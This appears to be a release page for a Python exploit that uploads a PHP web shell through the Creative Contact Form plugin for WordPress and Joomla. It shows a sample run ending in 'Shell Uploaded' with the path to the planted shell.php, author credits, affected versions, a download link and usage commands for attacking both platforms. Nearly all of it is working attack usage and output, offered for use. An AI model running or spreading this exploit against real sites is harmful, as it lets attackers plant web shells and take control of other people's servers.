claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http://127.0.0.1/wordpress -f shell.php -c wordpress
___ ___ __ __,-,__
| Y .-----.----.--| .-----.----.-----.-----. | ' '__|
|. | | _ | _| _ | _ | _| -__|__ --| | __|
|. / \ |_____|__| |_____| __|__| |_____|_____| |_______|
|: | _______ |__| __ |_|
|::.|:. | | _ .-----.-----.--------| .---.-.
`--- ---' |___| | _ | _ | | | _ |
|. | |_____|_____|__|__|__|__|___._|
|: 1 |
|::.. . |
`-------'
_______ __ __ _______ __ __
| _ .----.-----.---.-| |_|__.--.--.-----. | _ .-----.-----| |_.---.-.----| |_
|. 1___| _| -__| _ | _| | | | -__| |. 1___| _ | | _| _ | __| _|
|. |___|__| |_____|___._|____|__|\___/|_____| |. |___|_____|__|__|____|___._|____|____|
|: 1 | _______ |: 1 |
|::.. . | | _ .-----.----.--------. |::.. . |
`-------' |. 1___| _ | _| | `-------'
|. __) |_____|__| |__|__|__|
|: |
|::.|
`---'
Cr3ative C0nt4ct Form Sh3ll Upl04d
Discovered by:
Gianni Angelozzi
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[!] Shell Uploaded
[!] http://127.0.0.1/wordpress/wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php
Info
# Exploit Name: WordPress and Joomla Creative Contact Form Shell Upload Vulnerability
# WordPress plugin version: <= 0.9.7
# Joomla extension version: <= 2.0.0
Download
Download Exploit: HERE
Exploit Usage
WordPress:
claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http[s]://localhost[:PORT] -f shell.php -c wordpress
or
claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http[s]://localhost[:PORT]/basedir -f shell.php -c wordpress
Joomla:
claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http[s]://localhost[:PORT] -f shell.php -c joomla
or
claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http[s]://localhost[:PORT]/basedir -f shell.php -c joomla